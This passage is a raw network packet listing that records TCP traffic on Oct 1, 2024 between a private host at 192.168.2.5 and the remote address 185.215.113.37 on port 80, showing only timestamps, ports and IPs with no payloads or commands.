Oct 1, 2024 19:32:11.865658045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865667105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865675926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865678072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865689039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865701914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865734100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865834951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865845919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865854979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865864038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865873098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865874052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865884066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865894079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.865900993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865926027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.865933895 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950026035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950040102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950050116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950057030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950067043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950074911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950086117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950109959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950126886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950140953 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950176001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950176001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950190067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950201988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950222015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950242043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950242996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950253010 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950263977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950282097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950306892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950331926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950342894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950354099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950365067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950375080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950376987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950402975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950407028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950418949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950423002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950423956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950433016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950458050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950474977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950588942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950598955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950627089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950628996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950639963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950644016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950664043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950669050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950673103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950680017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950691938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950710058 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950719118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950740099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950804949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950820923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950830936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950841904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950845003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950855017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950866938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950890064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950911045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950922012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950932980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950942993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950953007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950953007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.950959921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950982094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.950994015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951003075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951004982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951015949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951030016 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951035976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951042891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951046944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951057911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951061010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951070070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951073885 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951098919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951121092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951124907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951136112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951147079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951158047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951162100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951174974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951186895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951189041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951205015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951206923 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951225042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951245070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951246023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951256037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951266050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951277018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951287031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951287985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951306105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951318026 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951334953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951345921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951356888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951366901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951374054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951380968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951396942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951400042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951422930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951447010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951464891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951476097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951486111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951498032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951504946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951515913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951533079 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951601982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951611996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951622963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951632977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951637030 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951643944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951654911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951667070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951666117 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951677084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951687098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951688051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.951714993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.951736927 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.987719059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987730980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987750053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987761974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987771988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987780094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.987818956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.987926006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987935066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987946987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.987963915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.987991095 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.987993956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988003969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988013983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988023996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988032103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988043070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988051891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988055944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988065004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988075972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988080025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988091946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988104105 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988104105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988115072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988121986 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988125086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988137007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988137960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988148928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988163948 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988182068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988188028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988198042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988207102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988220930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988251925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988338947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988377094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988404989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988415003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988425016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988435030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988445044 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988461971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988466978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988471985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988481998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988481998 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988492966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988503933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988512039 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988514900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988538027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988544941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988555908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988560915 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988579988 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988583088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988590956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988600969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988609076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988617897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988634109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988744020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988755941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988765955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988775015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988785028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988786936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988797903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988809109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988814116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988820076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988831997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:11.988841057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988848925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:11.988866091 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037061930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037075043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037092924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037105083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037111044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037117958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037133932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037141085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037146091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037151098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037158012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037163019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037173986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037179947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037203074 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037203074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037214994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037224054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037228107 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037237883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037247896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037250996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037262917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037264109 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037276983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037283897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037290096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037290096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037302017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037311077 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037333012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037378073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037641048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037652969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037662983 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037684917 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037693024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037703991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037712097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037714958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037727118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037740946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037751913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037761927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037767887 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037791014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037821054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037832022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037842989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037853003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037853956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037866116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037872076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037904024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037946939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037956953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037966967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037978888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.037985086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.037996054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038008928 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038012028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038019896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038033962 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038038969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038049936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038062096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038063049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038073063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038098097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038115978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038124084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038137913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038172960 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038191080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038243055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038264990 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038275957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038288116 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038300991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038305998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038316965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038320065 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038327932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038340092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038345098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038361073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038379908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038420916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038431883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038443089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038455963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038455963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038486958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038494110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038497925 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038508892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038517952 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038527012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038538933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038547993 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038549900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038562059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:12.038577080 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:12.038587093 CEST	49704	80	192.168.2.5	185.215.113.37
